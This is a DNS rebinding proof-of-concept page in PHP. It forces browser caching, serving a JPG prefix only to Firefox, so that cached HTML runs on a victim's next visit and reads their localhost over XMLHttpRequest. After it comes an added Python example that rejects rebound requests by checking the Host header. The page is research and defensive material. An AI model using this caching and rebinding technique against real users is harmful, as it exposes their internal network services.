<?php
// ... tag.
header("Content-type: text/html");

// Make the browser cache this page ("image") for a year
header("Cache-Control: max-age=31536000, must-revalidate");

/*
Problem: Firefox won't cache invalid images. However, if we output a valid JPG
before the HTML code, the file will be seen as valid. Funny thing is that if we
output the same data to IE, it will neglect the Content-Type and display an
image even when the URL is accessed directly (ignoring the HTML). So, we'll
output the JPG only if the browser is Firefox.
*/
if (strstr($_SERVER["HTTP_USER_AGENT"], "Firefox")){
    readfile("img.jpg");
}

// Now we output the HTML that is going to be cached, and executed on the next visit to this page.
// In theory, the PHP code above shouldn't be executed again (per victim).
?>

DNS rebinding PoC

This PoC requires JavaScript.

This PoC shows a way to send arbitrary HTTP requests to your internal network IPs. It uses browser cache and DNS rebinding.
This page can read the contents of your localhost (via XMLHttpRequest). If you have an HTTP server running on 127.0.0.1, here is its index page:
(if nothing appears here, it probably means that you do not have an HTTP server running on port 80)
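
A local HTTP service can refuse the kind of request this PoC sends by validating the Host header: after rebinding, the browser still sends the hostname of the page it loaded, not "localhost" or "127.0.0.1". The following is an added example, not part of the original PoC; the allowed names, the port 8080, the handler and the sample hostnames in the comments are assumptions.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumption: the only names under which this local service is legitimately reached.
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}
PORT = 8080  # assumption: unprivileged port chosen for the example


def host_is_allowed(host_header, allowed=ALLOWED_HOSTS, port=PORT):
    """Return True only if the Host header names this service itself."""
    if not host_header:
        return False  # HTTP/1.0-style request without Host: reject
    host = host_header.strip().lower()
    if host.startswith("["):
        # Bracketed IPv6 literal, optionally followed by ":port".
        name, bracket, rest = host.partition("]")
        name += bracket
        if rest and not rest.startswith(":"):
            return False
        port_str = rest[1:]
    else:
        name, _, port_str = host.partition(":")
    if port_str and port_str != str(port):
        return False
    # A trailing dot ("localhost.") is the same name in DNS terms.
    return name.rstrip(".") in allowed


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # A rebound request arrives on 127.0.0.1 but carries the
        # external hostname in Host, so it is rejected here.
        if not host_is_allowed(self.headers.get("Host")):
            self.send_error(403, "Host header not allowed")
            return
        body = b"index page\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", PORT), Handler).serve_forever()
```

Binding to 127.0.0.1 alone does not help here, because the rebound request comes from the local browser; the Host check is what distinguishes it.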